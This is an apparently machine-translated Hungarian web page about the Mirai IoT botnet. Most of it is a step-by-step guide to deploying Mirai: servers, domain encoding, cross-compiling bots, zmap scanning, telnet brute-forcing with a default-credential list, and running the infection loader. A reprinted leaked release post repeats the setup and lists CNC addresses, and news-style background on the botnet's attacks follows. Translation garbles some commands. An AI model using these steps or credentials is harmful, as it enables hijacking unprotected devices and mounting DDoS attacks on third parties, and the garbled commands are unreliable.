Mirai forráskód. A Mirai botnet telepítése és konfigurálása. A Mirai működési elve

Lényegében a Mirai egyszerűen működik: átvizsgálja az internetet, és keresi a telneten keresztül elérhető IoT-eszközöket, amelyek ki vannak téve a nyers erőszaknak és a hackelésnek. A kártevő elsősorban a térfigyelő kamerákat, DVR-eket és útválasztókat támadja meg, majd féregszerűen szaporodik tovább.

Ez a botnet a közelmúltban és a legnagyobb Európában végrehajtott DDoS támadásokból. A támadási csúcsteljesítmény elérte a 620 Gbit/s-ot és több mint 1 Tb/s-ot. Az ilyen eredmények eléréséhez a támadók UDP, DNS és HTTP elárasztást, valamint GRE (Generic Routing Encapsulation) csomagokat használtak, amelyeket a szakértők nagyon szokatlannak ismertek.

A MalwareTech szakértőinek következtetései általában egybeesnek ezekkel a megfigyelésekkel. Így tizenkét óra alatt a kutatók körülbelül 72 000 egyedi IP-címet rögzítettek, és óránként 4000 új IP-cím jelent meg. Ebből az elemzők arra a következtetésre jutottak, hogy a botnet mérete igen szerény – mindössze körülbelül 120 ezer eszköz naponta. És bár a botnet jóval nagyobb, és a számok 1-1,5 millió botot tesznek ki, ezzel sem a MalwareTech kutatói, sem az Akamai szakemberei nem értenek egyet.

"A Mirai, amelyet korábban a telnet támadások egyszerűsége miatt nagyrészt figyelmen kívül hagytak, a múlt héten a világ médiájának egyik fő témája lett, a bűnüldöző szervek nyomozást indítottak, számos nemzetközi cég támogatásával" - írják a kutatók. . „Nagyon valószínű, hogy az erőteljes DDoS támadások mostanra egyre gyakoribbá válnak, mivel a hackerek egyre több sebezhető IoT-eszközt találnak, vagy NAT-védett eszközöket kezdenek megfertőzni. Határozottan itt az ideje, hogy a gyártók leállítsák a globális jelszavakkal rendelkező eszközök alapértelmezés szerinti kiadását, és váltsanak olyan eszközökre, amelyek véletlenszerűen generált jelszavakat tartalmaznak a ház alján."

A jelentés mellett a MalwareTech kutatói egy videót is mellékeltek, amely a Mirai fertőzések térképét mutatja (lásd alább). A kutatók honlapján is megtalálható a botnet interaktív térképe, amely valós időben frissül.

Két VPS KVM szerverre és egy domainre lesz szükségünk. A virtualizáció KVM, az OpenVZ ezúttal hiányzik.

ide viszem a szervereket...

Az egyik szerverre magát a botnetet telepítjük, a másikra pedig a botokat vizsgáljuk. (brutális)

FONTOS. A szervereknek Debian 8-on kell alapulniuk, és legalább 1 GB RAM-mal kell rendelkezniük.

Bármilyen domain, nem számít.

Elnézést, természetesen, de nem mondom el, hogyan kell domaint csatolni egy VPS-hez. Nem nehéz, majd rájössz magadnak.

Gittés kezdjük.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang elektromos kerítés képernyő sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

A MySQL telepítésekor létre kell hoznia egy jelszót a MySQL eléréséhez a root felhasználó számára. Egy normál jelszót fog adni, minden „qwerty” nélkül.

Írd le valahova, újra szükségünk lesz rá.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#bash< <(curl -s -S -L

A linkek megtekintéséhez regisztrálnia kell.

# gvm install go1.4

# gvm használ go1.4 [--alapértelmezett]

# gvm install go1.4 -B

# gvm használ go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm használd a go1.5-öt

# gvm install go1.8

# gvm használd a go1.8-at

Az összes segédprogram telepítése után töltse le a botforrásokat -

A linkek megtekintéséhez regisztrálnia kell.

És töltse fel a szerverre. Csapat wget, vagy egyszerűen a programon keresztül WinSCP.

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string *******(írjuk a tartományunkat, ami a szerverhez van csatolva) és nyomjunk Entert.

Itt a következő szöveget fogod látni -

XOR" 14 bájt adatot...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - itt más szám lesz, szóval ne aggódj, minden rendben van.

Ezt az egész szöveget másoljuk.

Megnyitás nano-szerkesztővel vagy ezen keresztül WinSCP fájlt táblázat.c ami a mappában van mirai/bot

ezt látni kell -

A linkek megtekintéséhez regisztrálnia kell.

Vonal add_entry(TABLE_CNC_DOMAIN- minden idézőjelben módosítsa az imént másolt szöveget. Ahelyett " 30 " Megírjuk a számunkat, amit szintén most másoltunk. Ugyanezt tesszük a vonallal is add_entry(TABLE_SCAN_CB_DOMAIN

Mentse el és zárja be a szerkesztőt.

Nyissa meg a fájlt egy szerkesztővel mirai/cnc/main.go

Ezt látjuk...

A linkek megtekintéséhez regisztrálnia kell.

"127.0.0.1" váltani "127.0.0.1:3306"

"Jelszó" A korábban megadott jelszót MySQL-re változtatjuk. "

Mentse el a fájlt, és zárja be a szerkesztőt.

Csak másold le ezt a sok baromságot, nem mondom meg, miért van szükség rá

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

#wget

A linkek megtekintéséhez regisztrálnia kell.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

#mv keresztfordító-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Dokumentumok/go

# keresd meg a github.com/go-sql-driver/mysql-t

# keresd meg a github.com/mattn/go-shellwords-t

# cd Mirai-Source-Code-master/mirai

# ./build.sh telnet hibakeresése

# ./build.sh telnet kiadás

# mv mirai* /var/www/html

# cd /var/www/html

#mkdirbins

#mv*bins/

Most a MySQL.

# mysql -u root -p

Itt jelszót kell megadni. Írja be a korábban beállított jelszót.

# adatbázis létrehozása mirai;

# használd a mirait

Most másolja ki az összes szöveget innen -

A linkek megtekintéséhez regisztrálnia kell.

Illessze be, és nyomja meg az Enter billentyűt.

Másold ki a szöveget innen -

A linkek megtekintéséhez regisztrálnia kell.

Ahelyett anna-senpaiírja be a bejelentkezését. Bármi. Ugyanez a félelmetes jelszóval. Szükségünk lesz ezekre az adatokra a bot vezérlőpultjának eléréséhez.

Ennek így kellene lennie... INSERT INTO felhasználói ÉRTÉKEK (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Másolás, beillesztés, Enter.

Most már kimehetsz.

Majdnem kész.

# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# képernyő ./cnc

Látni kell a feliratot Megnyílt a MySQL DB

Nem zárjuk be ezt az ülést, hanem újat nyitunk.

A linkek megtekintéséhez regisztrálnia kell.

A ******* helyett írja be a domainjét, és kattintson a Megnyitás gombra.

Adja meg felhasználónevét és jelszavát, az én esetemben -

zaebalsjapisatj

Ez az, a bot vezérlőpultján vagyunk.

Most robotokra van szükségünk. Itt minden egyszerű, nincs szükség telepítésre.

Állítsuk be a betöltőt.

Betöltőre van szükség, hogy szöveges fájlokból robotokat lehessen hozzáadni. Tegyük fel, hogy létrehoztunk egy csomó eszközt (routerek, kamerák, telefonok), és ahhoz, hogy hozzáadjuk őket a bothoz, szükségünk van egy betöltőre.

A rakodó is egy "féreg"

Csatlakozzon szerverünkhöz ezen keresztül PuTTY és WinSCP.

A WinSCP segítségével megtaláljuk a fájlt fő.c mappában Mirai-Source-Code-master/dlr

Megírjuk szerverünk IP-jét a képernyőképen látható módon -

A linkek megtekintéséhez regisztrálnia kell.

Hagyjuk a vesszőt, ennek így kell lennie. Mentés és bezárás.

Most azzal PyTTY menj a szerverünkre és írj

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# cd kiadás

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Most pedig nyissuk ki WinSCPés keresse meg a fájlt fő.c mappában Mirai-Source-Code-master/loader/src

Megváltoztatjuk az IP-címünkre, mint a képernyőképen -

A linkek megtekintéséhez regisztrálnia kell.

Mentés és bezárás.

Keresztül Gitt -

# ./build.sh

Használva WinSCP nyissa meg a fájlt scanListen.go amely a mappában található Mirai-Source-Code-master/mirai/tools

Változás a szerver IP-jére -

A linkek megtekintéséhez regisztrálnia kell.

Aztán vele PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# go build scanListen.go

Most van egy új fájlunk - scanListen(nélkül .megy, Éppen scanListen)

scanListen mappába kell áthelyezni Mirai-Source-Code-master/loader

Csak segítséggel WinSCP tedd egy mappába rakodó

Most nézzük meg, hogy minden működik-e

# ./betöltő

Ha látja, mi van a képernyőn, akkor minden rendben van -

A linkek megtekintéséhez regisztrálnia kell.

Ha hiba adódik írj a topicba, segítek.

Botok letöltéséhez a listáról dobja be a szöveges fájlt a mappába rakodóés írja be a parancsot -

# macska lista.txt | ./loader

Ez az, az összes toborzott bot veled lesz, és az Ön parancsára összeomlik az oldalakon.

Én személy szerint nem használtam ezt a módszert, találtam egy egyszerűbb módot.

Itt kell egy második szerver. Szintén bekapcsolva Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap port-szkennelésre van szükségünk. A működés elve ugyanaz, mint KPortScan, csak 50-szer gyorsabb.

Másold ki az összes kódot innen -

A linkek megtekintéséhez regisztrálnia kell.

És mentse másként scan.py

Itt adhatja meg jelszavait és bejelentkezési adatait -

A linkek megtekintéséhez regisztrálnia kell.

Húr kombó ne nyúlj hozzá!

Itt regisztrálnia kell annak a szervernek az IP-címét, amelyen a bot található -

A linkek megtekintéséhez regisztrálnia kell.

Mindent megváltoztatunk és elmentünk.

A scan.py fájlt bárhová eldobjuk a szerverünkön. A második szerveren, amely tisztán szkennelésre szolgál, azon, amelyiken nem nyúlunk a bothoz.

IP-címekre van szükségünk, amelyeket ellenőrizni fogunk.

#zmap -p22 -o list.txt -B 100M(más portokat is lehet szkennelni, én mindig 22-t vagy 23-at vizsgáltam)

Minden eredmény a fájlban lesz list.txt

Az IP (minél több, annál jobb) összegyűjtése után list.txt dobja a fájl mellé scan.pyés írj -

# python scan.py list.txt 500

Ez az, ülünk és nézzük, hogyan növekszik a botnetünk.

Ha legalább 200 robot van, elindíthatja a betöltőt.

Ehhez lépjen arra a szerverre, ahol a botnet telepítve van, és -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./loader

Most a bot úgy fog működni, mint egy „féreg”, és több robotot végez.

A múlt héten kiszivárgott az internetre a rekordméretű, akár 1 Tb/s-os kapacitású DDoS-támadásokban használt Mirai botnet összetevőinek forráskódja.

Művészet. Az Orosz Föderáció Büntető Törvénykönyvének 273. cikke. Rosszindulatú számítógépes programok létrehozása, használata és terjesztése

1. Számítógépes programok vagy egyéb számítógépes információk létrehozása, terjesztése vagy felhasználása, amely szándékosan a számítógépes információk jogosulatlan megsemmisítésére, blokkolására, módosítására, másolására vagy a számítógépes információvédelmi eszközök semlegesítésére irányul, -

négy évig terjedő szabadságvesztéssel vagy négy évig terjedő kényszermunkával, vagy ugyanennyi ideig tartó szabadságvesztéssel büntetendő kétszázezer rubelig terjedő pénzbüntetéssel vagy az elítélt munkabérének vagy egyéb jövedelmének összege legfeljebb tizennyolc hónapig.

2. A jelen cikk első részében meghatározott cselekmények, amelyeket személyek csoportja előzetes összeesküvés vagy szervezett csoport, vagy hivatali helyzetét használó személy követett el, valamint olyan cselekmények, amelyek jelentős kárt okoztak vagy önös érdekből követtek el. , -

négy évig terjedő szabadságkorlátozással vagy öt évig terjedő kényszermunkával büntetendő, bizonyos tisztségek betöltésére vagy meghatározott tevékenységek végzésére való jogosultságtól három évig terjedő időtartamra elzárva, vagy e nélkül, vagy öt évig terjedő szabadságvesztés, százezer-kétszázezer rubel pénzbüntetéssel vagy az elítélt munkabérének vagy egyéb jövedelmének megfelelő összegű pénzbüntetéssel, kettőtől három évig terjedő időtartamra vagy anélkül, bizonyos tisztségek betöltésére vagy bizonyos tevékenységek végzésére való jog megvonásával vagy anélkül, legfeljebb három évig.

3. A jelen cikk első vagy második részében előírt cselekmények, ha azok súlyos következményekkel jártak, vagy bekövetkezésük veszélyét okozták, -

hét évig terjedő szabadságvesztéssel büntetendő.

Ez a botnet főleg kamerákból, DVR-eszközökből stb.

A fertőzés egészen egyszerűen megtörténik: az internetet átkutatják a nyitott 80/23 (web/telnet) portok után, és kiválasztják a kemény kódolt fiókokat.

Kevés felhasználó módosítja beépített fiókja jelszavát (ha lehetséges), így a botnet folyamatosan új eszközökkel töltődik fel. Ha megváltoztathatja a webes felület jelszavát, miközben benne van, akkor a jelszó és maga a telnet hozzáférés sok felhasználót egyszerűen elkerül.

A leggyakrabban használt fiókok a következők:

enable:system
shell:sh
admin:admin
gyökér:xc3511
root:vizxv
root:admin
root:xmhdipc
gyökér:123456
gyökér:888888
support:support
gyökér:54321
gyökér: juantech
gyökér:anko
gyökér:12345
admin:
root:default
admin: jelszó
gyökér:gyökér
gyökér:
felhasználó:felhasználó
admin:smcadmin
root:pass
admin:admin1234
gyökér: 1111
vendég:12345
gyökér: 1234
root: jelszó
gyökér:666666
rendszergazda: 1111
service:service
gyökér:rendszer
felügyelő: felügyelő
gyökér: klv1234
rendszergazda: 1234
gyökér:ikwb
gyökér: Zte521

A hozzáférés megszerzése után a parancsközpont bináris értesítést kap egy új bot jelenlétéről:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (a gazdagép címe itt volt)
05 = Tab
17 = 23 (23-as port Telnet)
05 = Tab
61 64 6d 69 6e = felhasználónév:admin rendszergazda
05= Tab
61 64 6d 69 6e = felhasználói jelszó: admin

A botnet összetevőit úgy tervezték, hogy különböző környezetekben működjenek, amint azt az azonosított minták is bizonyítják:

mirai.kar
mirai.kar7
mirai.mips
mirai.ppc
mirai.sh4

A parancsszerverek jelenleg a következő címeken találhatók:

103.1.210.27
103.1.210.28
185.130.225.65
185.130.225.66
185.130.225.83
185.130.225.90
185.130.225.94
185.130.225.95
185.70.105.161
185.70.105.164
185.93.185.11
185.93.185.12
200.170.143.5
46.249.38.145
46.249.38.146
46.249.38.148
46.249.38.149
46.249.38.150
46.249.38.151
46.249.38.152
46.249.38.153
46.249.38.154
46.249.38.155
46.249.38.159
46.249.38.160
46.249.38.161
80.87.205.10
80.87.205.11

A botnet létrehozására vonatkozó utasítások meglehetősen egyszerűek, íme, ahogy van (forrás http://pastebin.com/E90i6yBB):

Üdv mindenkinek,

Amikor először beléptem a DDoS iparágba, nem terveztem, hogy sokáig ott maradok. Megkerestem a pénzem, sok szem néz most az IOT-ra, szóval itt az ideje a GTFO-nak. Viszont ismerek minden csúszást és a mamájukat, nedves álmuk, hogy legyen valami a qboton kívül.

Tehát ma van egy csodálatos kiadványom a számodra. A Mirai-val max 380k botot szoktam húzni egyedül a telnetről. A Kreb DDoS után azonban az internetszolgáltatók lassan leálltak és megtisztították a tevékenységüket. Ma a maximális húzás körülbelül 300 ezer bot, és a leejtés.

Szóval, én vagyok a senpaid, és nagyon kedvesen fogok bánni veled, hf-chanom.

És mindenkinek, aki úgy gondolta, hogy bármit is csinál a CNC-m leütésével, jót nevettem: ez a bot CNC-hez használja a domaint. 60 másodpercbe telik, amíg az összes bot újracsatlakozik, lol

Továbbá, kiáltsd fel a malwaremustdie blogbejegyzését
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Nagyon tiszteltem Önt, azt hittem, hogy jó visszafordító vagy, de tényleg teljesen és totálisan megbuktál ennek a binárisnak a visszafordításában. „Nekünk még mindig jobb a kung fu, mint nektek, kölykök” ne röhögtess meg, kérlek, annyi hibát követtél el, és még össze is kevertél néhány binárist az enyémmel. LOL

Hadd adjak vissza néhány pofont...
1) A 48101-es port nem a hátsó csatlakozásra szolgál, hanem a vezérlésre szolgál, hogy megakadályozza, hogy több bot együtt futhasson
2) A /dev/watchdog és a /dev/misc nem a késleltetésre szolgál, hanem a rendszer lefagyásának megakadályozására. Ez egy alacsonyan lógó gyümölcs, annyira szomorú, hogy nagyon buta vagy
3) Megbuktál, és azt hitted, hogy a FAKE_CNC_ADDR és a FAKE_CNC_PORT valódi CNC, lol „És a hátsó ajtón keresztül csatlakozol HTTP-n keresztül a 65.222.202.53-on.” megbotlottál a jeláramlás miatt;) próbáld meg jobban a skiddo-t
4) A csontváz eszközöd szar, azt hitte, hogy a támadás dekóder "sinden stílusú", de még csak nem is használ szöveges protokollt? A CNC és a bot bináris protokollon keresztül kommunikál
5) azt mondod, hogy „chroot(“/”) olyan kiszámítható, mint a torlus”, de nem érted, mások cwd alapján ölnek. Megmutatja, hogy mennyire nem jár a valódi rosszindulatú programokkal szemben. Menj vissza a skidlandbe

Miért írsz visszafejtő eszközöket? Eleinte még helyesen visszafordítani sem lehet. Kérjük, először tanuljon meg néhány készséget, mielőtt megpróbálna lenyűgözni másokat. Arroganciád, amikor kijelented, hogyan „vertél meg” a hülye kung-fu kijelentéseddel, annyira megnevettet, miközben megettem a SO-t, és megveregette a vállam.

Ahogy én örökre szabad leszek, úgy te is örökre középszerűségre leszel ítélve.

Követelmények
2 szerver: 1 CNC + mysql, 1 szkenner vevő és 1+ betöltés

OP követelmények
2 VPS és 4 szerver
— 1 VPS rendkívül golyóálló gazdagéppel adatbázis-kiszolgálóhoz
— 1 VPS, rootkittel, szkenner-vevőhöz és elosztóhoz
- 1 szerver CNC-hez (mint 2% CPU 400 000 robottal)
— 3x 10gbps-os NForce szerver a betöltéshez (a forgalmazó 3 szerverre egyenlően oszt el)

— A CNC-vel való kapcsolat létrehozásához a robotok feloldanak egy tartományt (resolv.c/resolv.h), és csatlakoznak az IP-címhez
— A robotok brute telnetet hoznak létre egy fejlett SYN szkenner segítségével, amely körülbelül 80-szor gyorsabb, mint a qbot, és csaknem 20-szor kevesebb erőforrást használ. Ha nyers eredményt talál, a bot felold egy másik tartományt, és jelenti azt. Ez egy külön szerverhez van láncolva, hogy az eredmények beérkezésekor automatikusan betöltődik az eszközökre.
— A brutális eredményeket alapértelmezés szerint a 48101-es porton küldik. Az eszközökben található scanListen.go nevű segédprogram nyers eredmények fogadására szolgál (a csúcsidőben körülbelül 500 brutális eredményt kaptam másodpercenként). Ha hibakeresési módban építkezik, a scanListen segédprogramnak a hibakeresési mappában kell megjelennie.

A Mirai az önrep-hez hasonló terjesztési mechanizmust használ, de amit én „valós idejű terhelésnek” hívok. Alapvetően a botok nyers eredményeket küldenek, elküldik a scanListen segédprogrammal figyelő szerverre, amely elküldi az eredményeket a betöltőnek. Ezt a ciklust (brute -> scanListen -> load -> brute) valós idejű betöltésnek nevezik.

A betöltő beállítható úgy, hogy több IP-címet használjon a portok kimerülésének megkerülésére linuxban (korlátozott számú port áll rendelkezésre, ami azt jelenti, hogy nincs elég változatosság a tuple-ben ahhoz, hogy több mint 65 000 egyidejű kimenő kapcsolatot kapjon – elméletileg ez az érték sok Kevésbé). Talán 60 000 – 70 000 egyidejű kimenő kapcsolatom lenne (egyidejű betöltés) 5 IP-n keresztül.
A Bot számos konfigurációs opcióval rendelkezik, amelyek a (table.c/table.h) alatt vannak elhomályosítva. A ./mirai/bot/table.h tudsz megtalálja a legtöbb leírást a konfigurációs lehetőségekről. A ./mirai/bot/table.c fájlban azonban van néhány beállítás, amelyet *meg kell* változtatnia, hogy munkába álljon.

— TABLE_CNC_DOMAIN — CNC domain neve, amelyhez csatlakozni kell — A DDoS elkerülése nagyon mókás a mirai-val, az emberek megpróbálják eltalálni a CNC-met, de gyorsabban frissítem, minthogy új IP-ket találjanak, lol. Retardák :)
— TABLE_CNC_PORT — Csatlakozási port, amely már 23-ra van állítva
— TABLE_SCAN_CB_DOMAIN — Ha brutális eredményeket talál, erre a tartományra kerül jelentés
— TABLE_SCAN_CB_PORT — A nyers eredményekhez való csatlakozáshoz szükséges port, már 48101-re van állítva.

A ./mirai/tools fájlban találsz valami enc.c nevet – ezt le kell fordítanod a table.c fájlba helyezendő dolgok kimenetéhez

Fuss ebben a mirai könyvtárban

./build.sh hibakeresési telnet

Néhány hibaüzenet jelenik meg, ha a keresztfordítók nincsenek ott, ha nem konfiguráltad őket. Ez rendben van, nem befolyásolja az enc eszköz fordítását

Most a ./mirai/debug mappában látnia kell egy enc nevű lefordított bináris fájlt. Ha például a domain névhez tartozó obfuszkált karakterláncot szeretne kapni a robotok számára, amelyekhez csatlakozni tud, használja a következőt:

./debug/enc string fuck.the.police.com
A kimenetnek így kell kinéznie

20 bájt adat XOR feldolgozása…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
Például a TABLE_CNC_DOMAIN érték frissítéséhez cserélje ki a hosszú hexadecimális karakterláncot az enc eszköz által biztosított karakterláncra. Azt is látja, hogy „20 bájt adat XOR-e”. Ennek az értéknek az utolsó argumentumot is fel kell váltania. Így például a table.c sor eredetileg így néz ki
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Most, hogy ismerjük az enc eszköz értékét, így frissítjük

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x); //bassza meg.the.police.com
Egyes értékek karakterláncok, mások port (uint16 hálózati sorrendben / big endian).
A CNC KONFIGURÁLÁSA:
apt-get install mysql-server mysql-client

A CNC működéséhez adatbázis szükséges. Az adatbázis telepítésekor lépjen be, és futtassa a következő parancsokat:
http://pastebin.com/86d0iL9g

Ezzel létrehoz egy adatbázist az Ön számára. Felhasználó hozzáadásához

INSERT INTO felhasználói ÉRTÉKEK (NULL, 'anna-senpai', 'mywesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Most lépjen be a ./mirai/cnc/main.go fájlba

Szerkessze ezeket az értékeket
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "jelszó"
const DatabaseTable string = "mirai"
Az információhoz a mysql szerver most telepítetted

A keresztfordítók egyszerűek, a beállításhoz kövesse az ezen a linken található utasításokat. A változtatások életbe léptetéséhez újra kell indítania a rendszert, vagy újra kell töltenie a .bashrc fájlt.

http://pastebin.com/1rRCc3aD
A CNC, a bot és a kapcsolódó eszközök:
http://dopefile.pk/a9f2n9ewk8om
Hogyan építsünk botot + CNC
A mirai mappában található a build.sh szkript.
./build.sh hibakeresési telnet

Kiadja a bot hibakereső binárisait, amelyek nem démonizálnak, és információkat nyomtatnak ki arról, hogy tud-e csatlakozni a CNC-hez stb., az áradások állapotáról stb. A ./mirai/debug mappába fordítódik
./build.sh telnet kiadás

Kiadja a rendkívül csupaszított, kicsi (kb. 60K) gyártásra kész bináris botokat, amelyeket be kell tölteni az eszközökre. Az összes bináris fájlt a következő formátumban fordítja le: „mirai.$ARCH” a ./mirai/release mappába

A betöltő a következő formátumban olvassa be a telnet bejegyzéseket az STDIN-ből:
ip:port user:pass
Érzékeli, hogy van-e wget vagy tftp, és ennek segítségével próbálja letölteni a bináris fájlt. Ha nem, akkor echoload egy apró binárist (kb. 1 kb), ami elegendő wget-ként.
./build.sh

Megépítik a rakodót, optimalizált, gyártási felhasználás, nincs felhajtás. Ha a betöltéshez használt formátumú fájlja van, ezt megteheti
macska fájl.txt | ./loader
Ne felejts el korlátozni!

Csak hogy egyértelmű legyen, nem adok semmiféle 1 az 1-re oktatóprogramot vagy szarságot, túl sok időt. Minden szkript és minden benne van a működő botnet 1 órán belüli beállításához. Szívesen segítek, ha egyéni kérdései vannak (hogy lehet, hogy a CNC nem csatlakozik az adatbázishoz, ezt most megcsináltam bla-bla), de nem olyan kérdésekben, mint "A robotom nem csatlakozik, javítsd meg"

Ez az a trójai, amelyről mindenki írt az elmúlt hetekben. A segítségével létrehozott botnetek leglenyűgözőbb vívmányai közé tartozik a több mint egy terabites kapacitás és egy kis afrikai országban.

Hány számítógépet tett rabszolgasorba ezért?

Egyáltalán nem. Vagy legalábbis nagyon kevés. A Mirai céleszközei egyáltalán nem számítógépek, hanem IoT-eszközök – videórögzítők, kamerák, kenyérpirítók... A Level 3 Communications statisztikái szerint október végén már mintegy félmillió eszköz állt a trójai irányítása alatt.

És mi van, bármilyen hűtővel ellátott kamerát meg tud ragadni?

Nem igazán. A Mirai a Busyboxot futtató eszközökre lett szabva – UNIX segédprogramok egyszerűsített készlete parancs sor, amelyet a beágyazott rendszer fő felületeként használnak operációs rendszer. A trójai csak bizonyos platformokat támad meg, mint például az ARM, ARM7, MIPS, PPC, SH4, SPARC és x86. Csak a gyári beállításokkal rendelkező vagy nagyon gyenge védelemmel rendelkező eszközök vannak veszélyben – a fertőzés a Telnet porton végrehajtott brute force támadás során történik, amelyhez a rendszergazdai hitelesítő adatok alapértelmezett listáját használják.

Valahogy nem hatékony az egész interneten jelszavak nélkül keresni kamerákat – nem igaz?

De nem tippeltek jól. A The Atlantic egyik újságírója bérelt egy szervert, és írt egy programot, amely kenyérpirítónak adja ki magát. Az első támadás egy „háztartási készülék” ellen 40 perc után történt! A következő 11 órában a kenyérpirítót több mint 300 alkalommal törték fel. A helyzet az, hogy a botnetek soha nem látott méreteket értek el, és az IPv4-címterületük nagyon kicsi. Sőt, nem árt emlékezni arra is, hogy a hackerek nem manuálisan keresik a sebezhető eszközöket – ezt a botnet tagjai teszik meg. És mivel minden újonnan áttért „alkalmazott” áldozatokat keres, a botnet exponenciálisan növekszik.

Mértanilag? Tehát egy év múlva a botnetek több billió eszközt tartalmaznak majd?!

Persze nem 😀 Az tény, hogy az IoT eszközök száma véges. És ez már elég sürgető probléma. A Mirai szerzője bevallja, hogy hálózatán 380 ezer volt az eszközök maximális száma, és több támadást követően, amikor a felhasználók és a szolgáltatók védekező intézkedéseket kezdtek tenni, az eszközök száma 300 ezerre csökkent, és tovább csökken.

Miután a Mirai forráskódja nyilvánosan elérhetővé vált, sok és sok hacker kezdte használni. Jelenleg az erre a trójaira épülő nagy botnetek száma körülbelül 52. Érdemes tisztázni, hogy minden eszköz csak egy hálózathoz tartozhat - az eszköz elfogása után a kártevő azonnal megvédi az újbóli fertőzéstől. Az egyetlen eset, amikor egy eszközt át lehet adni egy másik „tulajdonosnak”, az az eszköz újraindítása. A szakértők szerint az újraindítás után 30 másodpercen belül újra megfertőződik az eszköz.

Tehát a Mirai hatékonysága csökken?

Igen. A hackerek korlátozott mennyiségű erőforrásért kénytelenek küzdeni, ami inkább csökken (az óvintézkedések miatt), mintsem növekszik. A helyzetet tovább bonyolítja, hogy a hackerek rendkívül önzőek – például miután a botnet egy nagyobb parancs- és vezérlőszerverét egyszerűen kikapcsolták –, most kiderült, hogy a botnet használhatatlan és sebezhetetlen az új támadásokkal szemben. Minden egyes új hálózat a Mirai alapján kisebb lesz, mint a korábbiak, és csak kis teljesítményű támadásokra lesz képes. Például az amerikai választások idején gyenge támadásokat hajtottak végre Clinton és Trump weboldalai ellen. Nem okoztak kárt, és egyáltalán senki nem vette észre őket (kivéve azt a céget, amely kifejezetten figyeli ennek a trójainak a tevékenységét).

Ez egyértelmű. Milyen érdekes információk ismertek még erről a trójairól?

Ez egy másik trójai utódja, amely Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor és Torlus néven ismert. Utóbbi arról ismert, hogy ugyanazon Level 3 Communications szerint körülbelül egymillió webkamerát képes leigázni. Az is ismert, hogy a legtöbb botnet nem a Mirai tiszta másolatát használja, hanem a saját, módosított verzióit (ami eléggé elvárható).

Egy másik Érdekes tény az, hogy a RuNet felhasználók megtalálták forráskód Mirai orosz nyomkövetés - a cnc/admin.go fájlban orosz nyelvű megjegyzések találhatók:

cnc/admin.go: this.conn.Write(byte(“\033))

Másrészt inkább viccnek tűnik – a „számlák ellenőrzése...” a „számlák ellenőrzése” nyilvánvaló mása (gépi fordítás?).

